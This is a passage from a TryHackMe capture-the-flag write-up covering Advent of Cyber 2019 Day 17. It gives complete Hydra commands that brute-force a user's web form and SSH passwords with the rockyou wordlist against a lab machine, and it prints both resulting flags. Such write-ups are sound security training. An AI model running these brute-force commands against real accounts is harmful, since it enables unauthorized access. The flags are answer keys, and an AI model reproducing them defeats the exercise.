pamhrituc/TryHackMe_Writeups/2019AdventOfCyber.md

    > dL6w.txt

 ### Day 17: Hydra-ha-ha-haa

+1. Use Hydra to bruteforce molly's web password.
+What is flag 1?
+(The flag is mistyped, its THM, not TMH)

+   Command used: `hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.175.104 http-post-form "/login:username=^USER^&password=^PASS^:F=Your username or password is incorrect" -V` (It took more then the first 30 passwords from the rockyou.txt file, so let hydra run for a while.).
+After hydra finds the password, log into the website using *molly* as the username and the password hydra found.
+The flag will be displayed after logging in.

+   > THM{2673a7dd116de68e85c48ec0b1f2612e}

+2. Use Hydra to bruteforce molly's SSH password.
+What is flag 2?

+   Command used: `hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.175.104 -t 4 ssh`.
+Hydra will return the password, then just log into the deployed machine using SSH, with *molly* as username and the password hydra found.

+   > THM{c8eeb0468febbadea859baeb33b2541b}

 ### Day 18: ELF JS
 ### Day 19: Commands
 ### Day 20: Cronjob Privilege Escalation